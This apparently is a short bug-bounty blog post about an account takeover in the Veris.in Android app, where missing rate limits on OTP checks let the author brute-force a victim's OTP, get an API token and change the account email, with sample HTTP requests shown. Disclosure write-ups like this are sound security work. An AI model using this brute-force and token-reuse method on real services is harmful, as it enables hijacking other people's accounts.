Veris.in Account Takeover

Hey Guys! Today I'll share you my Account takeover finding on Veris.in, So no more waste of time and start.



I installed Android app of Veris and started testing it, In Veris app we need to first verify our number and then we can register, While doing this i captured my request and try to bruteforce the OTP and noticed that there was no rate limitation so now i can use anyone's number in my account. So i did reported it, Now that was not a big deal, Then i started testing further after so many things my mind just noticed that every request have this type of structure,

POST /api/v1/*Any Functionality*/ HTTP/1.1
Authorization: token b910cxxx2ac02f3a8xxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 26

The thing i noticed that there is not like user session thing, it was working on a token ( In Authorization Header) Which is an authorization to API of veris but my mind said "from where did it came from :O like i have not entered any password" And then i said "Oh lol i entered One Time Password", 

So what happening here is when we enter number it sends a OTP to it and then after OTP verification it generates a token to authenticate us with API and check is the number match with any account in database, if does exist we'll be logged in that account. Now as i mentioned earlier "No Rate Limit on OTP" Now i can use this to generate OTP for your number and get a token for it by bruteforcing and Bhoom I can use the token to modify info of your account.

POST /api/v1/change_email/ HTTP/1.1
Authorization: token **BRUTEFORCED TOKEN GOES HERE**
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 26

{"email":"hacker@hack.com"}

If the number is NOT registered it will give a response like this one (Token Generated)

If the number is registered it will give a response like this one (Token Generated)

Video Proof of Concept






0 comments: